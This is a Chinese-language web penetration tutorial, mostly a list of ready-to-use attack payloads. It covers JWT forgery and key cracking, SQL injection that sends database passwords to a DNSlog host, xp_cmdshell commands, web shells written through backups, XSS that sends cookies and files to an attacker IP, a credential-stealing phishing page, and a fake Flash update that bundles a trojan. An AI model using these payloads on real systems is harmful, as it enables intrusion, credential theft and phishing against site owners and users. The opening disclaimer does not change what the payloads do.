免责声明 本教程仅为合法的教学目的而准备，严禁用于任何形式的违法犯罪活动及其他商业行为，在使用本教程前，您应确保该行为符合当地的法律法规，继续阅读即表示您需自行承担所有操作的后果，如有异议，请立即停止本文章读。

目录

 web服务突破

一、一些存在问题的逻辑

二、JWT攻击手法

未校验签名

禁用哈希

 爆破弱密钥

三、注入

注入无列名

结合dnslog

四、XSS

XSS克隆钓鱼

伪造页面钓鱼

五、CSRF

六、php任意文件读取/下载

---

 web服务突破

一、一些存在问题的逻辑

任意用户注册
可爆破用户名
爆破用户名，密码
用户名注入
万能密码
用户名Xss
修改返回包信息，登入他人账户
修改cookie中的参数，如user,adminid等
HTML源码、JS等查看信息搜集一章
后台登录参数修改为注册参数/reg、/register、/sign等
密码重置
1．重置一个账户，不发送验证码，设置验证码为空发送请求。
2．发送验证码，查看相应包
3．验证码生存期的爆破
4．修改相应包为成功的相应包
5．手工直接跳转到校验成功的界面
6．两个账户，重置别人密码时，替换验证码为自己正确的验证码
7．重置别人密码时，替换为自己的手机号
8．重置自己的成功时，同意浏览器重置别人的，不发验证码
9．替换用户名，ID，cookie，token参数等验证身份的参数
10．通过越权修改他人的找回信息如手机/邮箱来重置

二、JWT攻击手法

https://jwt.io/#debugger-io

未校验签名

将原JWT串解码后修改用户名等身份认证的地方，生成新token发送请求

禁用哈希

Alg代表加密方式，修改用户名等身份认证的地方，把HS256设置为none生成token发送请求，使用python的pyjwt模块   

jwt.encode({'user':'admin','arg1':'value1','arg2':'value2'},algorithm='none',key='')

 爆破弱密钥

>pip3 install pyjwt
>python3 crack.py   

import jwt
    import termcolor
    jwt_str = R'token'
    with open('/root/password.txt') as f:
      for line in f:
      key_ = line.strip()
      try:
        jwt.decode(jwt_str,verify=True,key=key_)
        print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
        break
      except(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError):
        print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
      except jwt.exceptions.InvalidSignatureError:
        print('\r',' ' * 64, '\r\btry',key_,end='',flush=True)
        continue
    else:
      print('\r','\bnot found.')

三、注入

注入无列名

http://url/index.php?id=1 order by 6
http://url/index.php?id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -
http://url/index.php?id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -

结合dnslog

MYSQL结合dnslog
?id=1' and if((select load_file(concat('\\\\',(select database()),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
显示数据库
?id=1' and if((select load_file(concat('\\\\',(select schema_name from information_schema.schemata limit {0},1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
显示表
?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='dbname' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=0x1x1x2x limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
显示字段
?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
显示数据
?id=1' and if((select load_file(concat('\\\\',(select hex(user) from users limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
MSSQL结合dnslog
查数据
?id=1;DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');
Sa密码
?id=1DECLARE @host varchar(1024);SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_loginsWHERE name='sa')+'.ip.port.b182oj.ceye.io';EXEC('master..xp_dirtree"\'+@host+'\foobar$"');
执行命令
exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";
exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";
exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";
postgreSQL结合dnslog
?id=1;DROP TABLE IF EXISTS table_output;CREATE TABLE table_output(content text);CREATE OR REPL+ACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT;DECLARE query_result TEXT;BEGIN SELECT INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';EXECUTE exec_cmd;END;$$ LANGUAGE plpgSQL SECURITY DEFINER;SELECT temp_function();
Oracle结合dnslog
?id=1 union SELECT UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.nk40ci.ceye.io') FROM sys.DUAL;
?id=1 union SELECT DBMS_LDAP.INIT((select pass from test_user where id=1)||'.nk40ci.ceye.io',80) FROM sys.DUAL;
?id=1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||'.xx.nk40ci.ceye.io').GETCLOB() FROM sys.DUAL;
?id=1 union SELECT UTL_INADDR.GET_HOST_ADDRESS((select pass from test_user where id=1)||'.ddd.nk40ci.ceye.io') FROM sys.DUAL;

拿shell

判断数据库
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
查库
?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0 --
?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0 --

查表   

import requests
import re
table_list = ['']
    def get_sqlserver_table(table_list, table_num):
        for num in range(0,table_num):
            # print("','".join(table_list))
            sql_str = "and (select top 1 name from [xxxx].sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('{}'))>0".format("','".join(table_list))
            url = "http://www.xxxxx.cn/x.aspx?cid=1' {} AND 'aNmV'='aNmV".format(sql_str)
            r = requests.get(url, headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'})
            res = re.search(r'\'(.*)\'', r.content.decode('utf-8'),  re.M|re.I)
            table_name = str(res.group(1))
            table_list.append(table_name)
            print("[{}] - TableName: {}".format(str(r.status_code), table_name))
    if __name__ == "__main__":
        get_sqlserver_table(table_list, 16)   

判断是否存在xp_cmdshell
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
执行命令
;exec master..xp_cmdshell "net user name password /add"—
查看权限
and (select IS_SRVROLEMEMBER('sysadmin'))=1--  //sa
and (select IS_MEMBER('db_owner'))=1--   //  dbo
and (select IS_MEMBER('public'))=1--  //public
站库分离获取服务器IP
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;--
LOG备份
;alter database testdb set RECOVERY FULL --
;create table cmd (a image) --
;backup log testdb to disk = 'c:\wwwroot\shell.asp' with init --
;insert into cmd (a) values ('<%%25Execute(request("chopper"))%%25>')--
;backup log testdb to disk = 'c:\wwwroot\shell.asp' –
2000差异备份
;backup database testdb to disk ='c:\wwwroot\bak.bak';--
;create table [dbo].[testtable] ([cmd] [image]);--
;insert into testtable (cmd) values(木马hex编码);--
;backup database testdb to disk='c:\wwwroot\upload\shell.asp' WITH DIFFERENTIAL,FORMAT;--
2005差异备份
;alter/**/database/**/[testdb]/**/set/**/recovery/**/full—
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
;create/**/table/**/[itpro]([a]/**/image)—
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
;insert/**/into/**/[itpro]([a])/**/values(木马hex编码)—
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=木马保存路径的SQL_EN编码/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
;drop/**/table/**/[itpro]—
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
PostgreSQL写shell
连接
>psql -U dbuser -d exampledb -h 127.0.0.1 -p 5432
查看版本
>select version();
列出数据库
>select datname from pg_database;
列出所有表名
>select * from pg_tables;
读取账号秘密
>select usename,passwd from pg_shadow;
当前用户

`>select user;

修改密码

alter user postgres with password '123456';

列目录

select pg_ls_dir('/etc');

读文件

select pg_read_file('postgresql.auto.conf',0,100); #行数

&

drop table wooyun;

create table wooyun(t TEXT);

copy wooyun FROM '/etc/passwd';

select * from wooyun limit 1 offset 0;

&

select lo_import('/etc/passwd',12345678);

select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a;

写文件

create table shell(shell text not null);

insert into shell values(

);


copy shell(shell) to '/var/www/html/shell.php';

&

copy (select '') to '/var/www/html/shell.php';

爆破

MSF>use auxiliary/scanner/postgres/postgres_login

执行命令版本8.2以下

create function system(cstring) returns int AS '/lib/libc.so.6', 'system' language C strict;

create function system(cstring) returns int AS '/lib64/libc.so.6', 'system' language C strict;

select system('id');`

四、XSS

打COOKIE
<svg/onload="javascript:document.location.href=('http://xx.xx.xx.xx:7777?cookie='+document.cookie)">
读取HTML
<svg/onload="document.location='http://xx.xx.xx.xx:7777/?'+btoa(document.body.innerHTML)">
读文件
<svg/onload="
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
    if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
        document.location='http://xx.xx.xx.xx:7777/?'+btoa(xmlhttp.responseText);
    }
}
xmlhttp.open("GET","file.php",true);
xmlhttp.send();
">
XSS+SSRF读取服务器文件
<svg/onload="
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
    document.location='http://ip:23333/?'+btoa(xmlhttp.responseText);
}
}
xmlhttp.open("POST","request.php",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("url=file:///etc/passwd");
">

XSS克隆钓鱼

保存js&css到服务器，登录action改为接受密码的文件action="./pass.php"   

<?php //php
      $user=$_POST['username'];
      $pass=$_POST['password'];
      $file=fopen('pass.txt','a+');
      fwrite($file,$user."|"."pass" . "\n");
      fclose($file);
      echo "<script>window.location.href=\"http://192.168.0.1\"</script>\n";
    ?>   

构造payload
<script>window.location.href="http://192.168.0.1/login.html"</script>
php –S 0.0.0.0:8080 –t ./

伪造页面钓鱼

方法1
https://github.com/r00tSe7en/Fake-flash.cn
添加xss平台模块
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert("您的FLASH版本过低，尝试升级后访问该页面！");
window.location.href="http://www.flash.com";
制作自解压捆绑
一个马.exe，一个正常exe，全选，winrar添加到压缩文件，选择创建自解压格式压缩文件，高级->自解压选项，设置解压路径，c:\windows\temp\，设置->解压后运行两个exe文件，模式全部隐藏，更新，解压并更新文件，覆盖所有文件。
ResourceHacker修改文件图标
方法2
if(empty($_COOKIE['flash'])){
    echo '<script>alert("你当前计算机的Flash软件已经很久未更新，将导致无法正常显示界面内容，请下载安装最新版本！");window.location="http://www.flash.cn.xx.com/"</script>';
    setcookie("flash","true",time()+30*2400);
}

五、CSRF

查看有无token等验证身份的参数，删掉后是否返回正常
查看header中referer,origin参数，删掉后是否返回正常
使用csrftester/burpsuite生成表单，以另一账号和浏览器打开测试
去掉referer中域名后面的文件夹或文件
替换二级域名

六、php任意文件读取/下载

readfile()、file_get_contents()、fopen()等读文件的函数不严谨，读取文件路径可控，输出内容。
下载配置文件
Redis、Weblogic、ftp、mysql、web配置文件、history文件、数据库配置文件
下载log文件
下载web文件
/1.php?f=../../etc/passwd
/1.php?f=file:///etc/passwd(file://绕过../的防护)
/1.php?f=file:///etc/passwd